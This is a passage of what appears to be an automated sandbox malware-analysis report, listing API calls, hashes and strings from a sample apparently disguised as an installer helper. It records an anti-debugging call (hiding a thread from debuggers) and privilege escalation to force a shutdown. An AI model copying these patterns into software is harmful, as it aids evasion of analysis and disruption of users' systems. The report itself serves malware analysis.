                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ManagerOpen
                                                          • String ID:
                                                          • API String ID: 1889721586-0
                                                          • Opcode ID: 7011dd374ab607b29eaa3183d6adadfa2add0d54abb6ad796b14470577b50ed1
                                                          • Instruction ID: 276ea8ff09ed4d7a2cbefdec9af00a980189ad76ce56daa0fd2b30805fda045c
                                                          • Opcode Fuzzy Hash: 7011dd374ab607b29eaa3183d6adadfa2add0d54abb6ad796b14470577b50ed1
                                                          • Instruction Fuzzy Hash: E0312AB8608351EFC7108F28C548B0EBBF0EB89B54F51895EF988C6360C371C945AB53
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 6BF43E9D
                                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF43EAA
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Thread$CurrentInformation
                                                          • String ID:
                                                          • API String ID: 1650627709-0
                                                          • Opcode ID: a391787b78348eafddcfbf17442eb7fc5765a3347bcde0f6c0cbd05ec96ef28b
                                                          • Instruction ID: d789932a80e930c41b5f1d077c321694e39bd6cc2d605965f7ee55d8831fde09
                                                          • Opcode Fuzzy Hash: a391787b78348eafddcfbf17442eb7fc5765a3347bcde0f6c0cbd05ec96ef28b
                                                          • Instruction Fuzzy Hash: 6321F733118701CBD734CF28C890796BFB6AF86304F144A2DD0A6572A2DF7974048B51
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(?,?), ref: 6C0BAEDC
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: 3b44e2b41e329c94c23ede92226ffe00579e0831355087e46593645ebfd83f28
                                                          • Instruction ID: 5c7a427db91109efa55fe9784d8214cf71f6c3ed6644c7bdace0f213e6d74acc
                                                          • Opcode Fuzzy Hash: 3b44e2b41e329c94c23ede92226ffe00579e0831355087e46593645ebfd83f28
                                                          • Instruction Fuzzy Hash: A51166B0408362AFD710CB68D44469EBBE4BF86314F248E59F0A8DB690D335CC848B26
                                                          APIs
                                                          • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C09ABA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                                                          • API String ID: 2738559852-1563143607
                                                          • Opcode ID: 6ca7519bfc20b9a87e4485ab5f4560348c8bd37b9839641208e594a31e8ffe96
                                                          • Instruction ID: 4fcb24f697c6b72885c7ef9fcf67624e9ca5f60716de709afc124eb71c058960
                                                          • Opcode Fuzzy Hash: 6ca7519bfc20b9a87e4485ab5f4560348c8bd37b9839641208e594a31e8ffe96
                                                          • Instruction Fuzzy Hash: A6624770A0D3818FC724CF18C490B5EBBE2ABDA314F24991EE9A9CB751D734D945AB43

                                                          Control-flow Graph (rendered graph omitted; function at 6c0dcad3, basic blocks calling ReadFile, GetConsoleMode, ReadConsoleW, GetLastError; executed / not executed colouring not recoverable from text)
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8Q
                                                          • API String ID: 0-4022487301
                                                          • Opcode ID: dbf5a1064cf0b6da6866387491a7a44b4964a378e36ba17952dffe26fc2d504f
                                                          • Instruction ID: 9e23766200c2eddb9da858e99af33fecd5a3cc8727d7228e74a469e9ae89f459
                                                          • Opcode Fuzzy Hash: dbf5a1064cf0b6da6866387491a7a44b4964a378e36ba17952dffe26fc2d504f
                                                          • Instruction Fuzzy Hash: 17C1C170A04349AFDF01DFA8C880BADBBF5AF4A318F624159E810AB781C775B945CF61

                                                          Control-flow Graph (rendered graph omitted; function at 6c0e406c, basic blocks calling GetFileType, GetLastError, CloseHandle; executed / not executed colouring not recoverable from text)
                                                          APIs
                                                            • Part of subcall function 6C0E4457: CreateFileW.KERNEL32(00000000,00000000,?,6C0E4115,?,?,00000000,?,6C0E4115,00000000,0000000C), ref: 6C0E4474
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0E4180
                                                          • __dosmaperr.LIBCMT ref: 6C0E4187
                                                          • GetFileType.KERNEL32(00000000), ref: 6C0E4193
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0E419D
                                                          • __dosmaperr.LIBCMT ref: 6C0E41A6
                                                          • CloseHandle.KERNEL32(00000000), ref: 6C0E41C6
                                                          • CloseHandle.KERNEL32(6C0DB0D0), ref: 6C0E4313
                                                          • GetLastError.KERNEL32 ref: 6C0E4345
                                                          • __dosmaperr.LIBCMT ref: 6C0E434C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                          • String ID: 8Q
                                                          • API String ID: 4237864984-4022487301
                                                          • Opcode ID: 9dab5ff5c27ff3c177b540aef4e2b4068de638490a8959ea33cc85aa92c498bd
                                                          • Instruction ID: 8afdc2ddee86b38afdf8e44a6b0db1599d3271820675e7391979958d4474ca53
                                                          • Opcode Fuzzy Hash: 9dab5ff5c27ff3c177b540aef4e2b4068de638490a8959ea33cc85aa92c498bd
                                                          • Instruction Fuzzy Hash: 34A13732A44144AFCF098FE8C8517AE7BF1EB4A328F18425DE811EB781CB359906DB52

                                                          Control-flow Graph (rendered graph omitted; function at 6c09c1e0, basic blocks calling WriteFile and ReadFile; executed / not executed colouring not recoverable from text)
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: :uW$;uW$;uW$> 4!$> 4!
                                                          • API String ID: 0-4100612575
                                                          • Opcode ID: b1445b618c7aa92d96fb00cf4796f704948f5c41d8ce401ccba9449a3585a30a
                                                          • Instruction ID: 0f0072b5db2f6e650b3c52e0f36c91d2ab546b208418a8b5cae8184dd50a2cea
                                                          • Opcode Fuzzy Hash: b1445b618c7aa92d96fb00cf4796f704948f5c41d8ce401ccba9449a3585a30a
                                                          • Instruction Fuzzy Hash: B9718BB0608345AFD710DF54C880B6ABBF4FF8A708F50592EF598D6650D375D888AB93
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: K?Jo$K?Jo$`Rlx$7eO
                                                          • API String ID: 0-174837320
                                                          • Opcode ID: fa87c0a37d206f426255af6af38d90e2ce7b4d1c3faf0e5eebdf31c9df6928d1
                                                          • Instruction ID: 184e1737b15399ce202cecced1161912909be6ba25ad0c9d90241cfaff4b316e
                                                          • Opcode Fuzzy Hash: fa87c0a37d206f426255af6af38d90e2ce7b4d1c3faf0e5eebdf31c9df6928d1
                                                          • Instruction Fuzzy Hash: B34257B46093428FC764CF18C090B2EBBE1AFC9324F24AE1EE5A587B60D634D945DB53
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ;T55
                                                          • API String ID: 0-2572755013
                                                          • Opcode ID: 882a942a3ebf22f3de10f2238167002744bfbbd36881f2ce467499a5b86c5a83
                                                          • Instruction ID: 13b00e5229b5c323a3f6e191573bb66299600866ea993f79ee8d5cd41a8ea94f
                                                          • Opcode Fuzzy Hash: 882a942a3ebf22f3de10f2238167002744bfbbd36881f2ce467499a5b86c5a83
                                                          • Instruction Fuzzy Hash: D703E633644B018FC728CF28C8D0695B7E3EFD53247198AADC4E64B6A5DB78B54ACB50

                                                          Control-flow Graph
                                                          • Function 6c0c4ff0: blocks call CreateProcessA, WaitForSingleObject, CloseHandle * 2
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID: D
                                                          • API String ID: 963392458-2746444292
                                                          • Opcode ID: 9dcf08a206b3bbdf5edb8452cc1b5ea630d27265aeb26ec27a3b7b8d2bc1043b
                                                          • Instruction ID: f3485eeb0170fdabbf81bf86da3f3bb234bab1787c6a3de5d1c2a6a1a58bc4ab
                                                          • Opcode Fuzzy Hash: 9dcf08a206b3bbdf5edb8452cc1b5ea630d27265aeb26ec27a3b7b8d2bc1043b
                                                          • Instruction Fuzzy Hash: 6F3102749093808FD340DF28C19872EBBF0EB8A358F505A1DF8D986250E7789588CF43

                                                          Control-flow Graph
                                                          • Function 6c0dbc5e: blocks call WriteFile, GetLastError and internal subroutines 6c0cf9df, 6c0cf9cc, 6c0d0120, 6c0dac69, 6c0dbe40, 6c0dbeb1, 6c0dc25b, 6c0dc2c3, 6c0dc487, 6c0dc39e, 6c0cf9f2
                                                          APIs
                                                            • Part of subcall function 6C0DBEB1: GetConsoleCP.KERNEL32(?,6C0DB0D0,?), ref: 6C0DBEF9
                                                          • WriteFile.KERNEL32(?,?,6C0E46EC,00000000,00000000,?,00000000,00000000,6C0E5AB6,00000000,00000000,?,00000000,6C0DB0D0,6C0E46EC,00000000), ref: 6C0DBDAF
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C0E46EC,6C0DB0D0,00000000,?,?,?,?,00000000,?), ref: 6C0DBDB9
                                                          • __dosmaperr.LIBCMT ref: 6C0DBDFE
                                                          Strings
                                                          Similarity
                                                          • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                                          • String ID: 8Q
                                                          • API String ID: 251514795-4022487301
                                                          • Opcode ID: 132285a8fa8aca1c0651a57070ff89c829d90fad215e5c4a8c0cfb44fa15ad61
                                                          • Instruction ID: 6e45ec93a3c751a8b5fc8aa818508e07b0289fd478fad7561c28b72f8184161c
                                                          • Opcode Fuzzy Hash: 132285a8fa8aca1c0651a57070ff89c829d90fad215e5c4a8c0cfb44fa15ad61
                                                          • Instruction Fuzzy Hash: 4F51C571A0030AAFDF019FA8C840BEEBBF9EF05358F560551E510A7A51DB70B945CBA1

                                                          Control-flow Graph
                                                          • Function 6c0c5b90: blocks call internal subroutines 6bf901f0, 6c0d0b18, 6bf92250, 6bf92340, 6c0c9379, 6bf8e010, 6c0c7088
                                                          APIs
                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0C5D31
                                                          Strings
                                                          Similarity
                                                          • API ID: Ios_base_dtorstd::ios_base::_
                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                          • API String ID: 323602529-1866435925
                                                          • Opcode ID: c79c6338b80c732580a1861a99dd2322247e7119c57e508d310e656da3cd90ab
                                                          • Instruction ID: 983d45d8af53bba410f8ff734203849c4d6d8c996710b88a30bb91d1233496ac
                                                          • Opcode Fuzzy Hash: c79c6338b80c732580a1861a99dd2322247e7119c57e508d310e656da3cd90ab
                                                          • Instruction Fuzzy Hash: 565124B5600B008FD725CF29C495BA6BBF1FB48318F508A2DD89647B90D775B909CF91

                                                          Control-flow Graph
                                                          • Function 6c0db925: blocks call CloseHandle, GetLastError and internal subroutines 6c0e15a2, 6c0e171f, 6c0cf9f2
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,6C0E425F), ref: 6C0DB97B
                                                          • GetLastError.KERNEL32(?,00000000,?,6C0E425F), ref: 6C0DB985
                                                          • __dosmaperr.LIBCMT ref: 6C0DB9B0
                                                          Similarity
                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                          • String ID:
                                                          • API String ID: 2583163307-0
                                                          • Opcode ID: 77c5d9b0f400e6da8f716973a57377b2c3964bad2feb51d3807e18e5d3c6867e
                                                          • Instruction ID: bc4c40d611272a1f64b0d0a304d7ea03436eaaa6075fb142002965c1c6ba4a66
                                                          • Opcode Fuzzy Hash: 77c5d9b0f400e6da8f716973a57377b2c3964bad2feb51d3807e18e5d3c6867e
                                                          • Instruction Fuzzy Hash: F6014833A452A05AC201077AA845B9DA7E94F87B3CF2A4709E82587AC2CF60F885C290

                                                          Control-flow Graph
                                                          • Function 6c0d0b9c: blocks call internal subroutines 6c0cf9cc, 6c0d0120, 6c0d0cb9, 6c0d873e, 6c0d9c60, 6c0db898, 6c0dae75, 6c0d47bb
                                                          Strings
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8Q
                                                          • API String ID: 0-4022487301
                                                          • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                                          • Instruction ID: 6da696bc5f27015316ce5573d13d56b6a4f9cc28bc80b1d3ffd870fe0d96020a
                                                          • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                                          • Instruction Fuzzy Hash: F0F0F4325097546AC6211B39AC00BDB36D89F4237CF231715E87893ED0DB70F40ACAE2
                                                          APIs
                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0C5AB4
                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0C5AF4
                                                          Similarity
                                                          • API ID: Ios_base_dtorstd::ios_base::_
                                                          • String ID:
                                                          • API String ID: 323602529-0
                                                          • Opcode ID: 60309b47636b8b73f2600095ab1510f0a8a66e70a24c263812ef35a8af43ede4
                                                          • Instruction ID: d9b69faea24a0d0aa227bdb4362e91bb81dd11d9ba1effada35ab4dd24cb77dd
                                                          • Opcode Fuzzy Hash: 60309b47636b8b73f2600095ab1510f0a8a66e70a24c263812ef35a8af43ede4
                                                          • Instruction Fuzzy Hash: FC514975201B01DFD725CF25C485BE6BBF4FB08718F448A1CE8AA4B6A1DB34B549CB81
                                                          APIs
                                                          • GetLastError.KERNEL32(6C0F6DD8,0000000C), ref: 6C0CEF52
                                                          • ExitThread.KERNEL32 ref: 6C0CEF59
                                                          Similarity
                                                          • API ID: ErrorExitLastThread
                                                          • String ID:
                                                          • API String ID: 1611280651-0
                                                          • Opcode ID: c97eda8bd8b9acfee6997c42a3fad485c7ca6dda280eea3b9cb18656e85dca3c
                                                          • Instruction ID: 7ff4d836846209e06997e57566a70cd09646bb0a13e0e9b1abeaac93bbe6340f
                                                          • Opcode Fuzzy Hash: c97eda8bd8b9acfee6997c42a3fad485c7ca6dda280eea3b9cb18656e85dca3c
                                                          • Instruction Fuzzy Hash: FAF0AFB1A00204AFDF009FB0D40ABAE3BF4FF41218F154649E42597B40CF34B946DBA2
                                                          APIs
                                                          Similarity
                                                          • API ID: __wsopen_s
                                                          • String ID:
                                                          • API String ID: 3347428461-0
                                                          • Opcode ID: e4fcf6bbbca3634c751cf0e20047692dcd11b5da4ea6888e5884837c1d1b2adf
                                                          • Instruction ID: daff465e35a268d62ad76ec9c3736a205e75f430edbca84598b2198dcc10689f
                                                          • Opcode Fuzzy Hash: e4fcf6bbbca3634c751cf0e20047692dcd11b5da4ea6888e5884837c1d1b2adf
                                                          • Instruction Fuzzy Hash: FD118871A0420EAFCF05CF58E945A9B3BF8EF48308F054069F808AB301D631EA11CBA4
                                                          APIs
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                                          • Instruction ID: 8fabd6d652315a8107c37655f75dd68ec912be72ba93f26020e9240a20051c05
                                                          • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                                          • Instruction Fuzzy Hash: F0012872C01159BFCF029FE88D00AEE7FF5AB08214F154165BD24A26A0E7319A24DB91
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,00000000,?,6C0E4115,?,?,00000000,?,6C0E4115,00000000,0000000C), ref: 6C0E4474
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                           • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: a45bd3b60dd0e8c276be429b58f2359b8707531b6bcd28fe20699299d7201716
                                                          • Instruction ID: 2dc6c3185138df8cb28b9d9f7cf74f0394906190dddd2fdd4614e9dda2622d7b
                                                          • Opcode Fuzzy Hash: a45bd3b60dd0e8c276be429b58f2359b8707531b6bcd28fe20699299d7201716
                                                          • Instruction Fuzzy Hash: DAD06C3210010DBBDF028E84DD06EDA3BAAFB88714F014000BE1856020C732E861AB90
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                           • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                                          • Instruction ID: dddcfcd49160081868d17e97d85d40bf85997d413c42dd535c0de8a6c7980fcf
                                                          • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                                          • Instruction Fuzzy Hash:
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                           • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: g)''
                                                          • API String ID: 4218353326-3487984327
                                                          • Opcode ID: 1d2704309ea588572f6360b9ece49afcc7d0d2efb0bb69668923891640ce5075
                                                          • Instruction ID: 2bcf0cab47e4c38dc211d182357c739ff517fabcb4c6f023be4e1d71f66b22f5
                                                          • Opcode Fuzzy Hash: 1d2704309ea588572f6360b9ece49afcc7d0d2efb0bb69668923891640ce5075
                                                          • Instruction Fuzzy Hash: 4C630371744B018FC728CF28C4D0B99B7F3BF99318B598A6DC0A64BA55EB74B44ACB41
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 6C0C5D6A
                                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C0C5D76
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C0C5D84
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C0C5DAB
                                                          • NtInitiatePowerAction.NTDLL ref: 6C0C5DBF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                           • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                                                          • String ID: SeShutdownPrivilege
                                                          • API String ID: 3256374457-3733053543
                                                          • Opcode ID: 8a10dbd49a911b1306495271cba9595475649eb973052434d816ed67304d9a3b
                                                          • Instruction ID: 2d7dbaf430851fdc0995a43eb9cd0b488e557a340e54928b56817fff2bbce463
                                                          • Opcode Fuzzy Hash: 8a10dbd49a911b1306495271cba9595475649eb973052434d816ed67304d9a3b
                                                          • Instruction Fuzzy Hash: 34F0B470648300BBEA106B24DD0EB6A7FF4EF45701F014608F945A61C1D7746A84DB92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                           • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
